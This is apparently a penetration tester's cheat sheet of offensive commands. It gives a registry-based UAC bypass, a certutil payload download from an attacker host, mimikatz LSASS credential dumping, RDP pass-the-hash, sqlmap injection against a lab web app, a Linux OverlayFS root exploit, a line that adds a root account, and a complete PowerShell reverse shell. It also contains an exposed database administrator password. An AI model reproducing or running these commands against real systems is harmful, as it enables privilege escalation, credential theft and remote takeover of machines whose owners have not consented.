# PS ```powershell=1 New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force ``` # download ```bash=1 certutil -urlcache -f http://<ip>:<port>/<file> <target_path> ``` - https://github.com/BeichenDream/GodPotato/releases # csc ```bash=1 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -out:EfsPotato.exe EfsPotato.cs ``` # PrivEsc - https://github.com/BeichenDream/GodPotato/releases - # NTLM - `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f` ```bash=1 mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit" ``` - `mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "exit"` - kali ```bash=1 xfreerdp +clipboard +home-drive /v:<IPADDRESS> /u:<USERNAME> /pth:<NTLM> ``` # read - https://www.mandiant.com/resources/blog/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware - https://jlajara.gitlab.io/Potatoes_Windows_Privesc - https://github.com/itm4n/PrintSpoofer # Vuln web 1 - sa:1qaz@WSX3edc~~ ```sql=1 CREATE DATABASE [NPA_TEST_DB]; GO USE [NPA_TEST_DB]; CREATE TABLE [TEST_TB] ( ID INT IDENTITY(1,1) NOT NULL PRIMARY KEY, DATA NVARCHAR(MAX) NULL ) INSERT INTO [TEST_TB] VALUES ('MEOW1'),('MEOW2'); SELECT * FROM [TEST_TB]; ``` - https://drive.google.com/file/d/17EbrcQw5z7Ir7eZtX-ApeYs4lqdNlYNr/view?usp=sharing - URL  - `http://<target>/SQL_GET.aspx?id=1` - `http://<target>/SQL_POST.aspx` - `http://<target>/Upload.aspx` # SQL - `sqlmap -u "http://192.168.50.2/SQL_GET.aspx?id=1" --random-agent --dbms=MSSQL --batch` - FoxyProxy Firefox plugin - (BURP 抓包 POST) 參考 https://blog.csdn.net/qq_33163046/article/details/128293938 `sqlmap -r npa_post_test.txt -p "txt_Data" --random-agent --dbms=MSSQL --batch` # lin privesc -`unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"` - `echo "pwn0:\$1\$ignite\$0q2pSX8sLvJPmEwIRPOko0:0:0:root:/root:/bin/bash" > hack` # powershell - `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`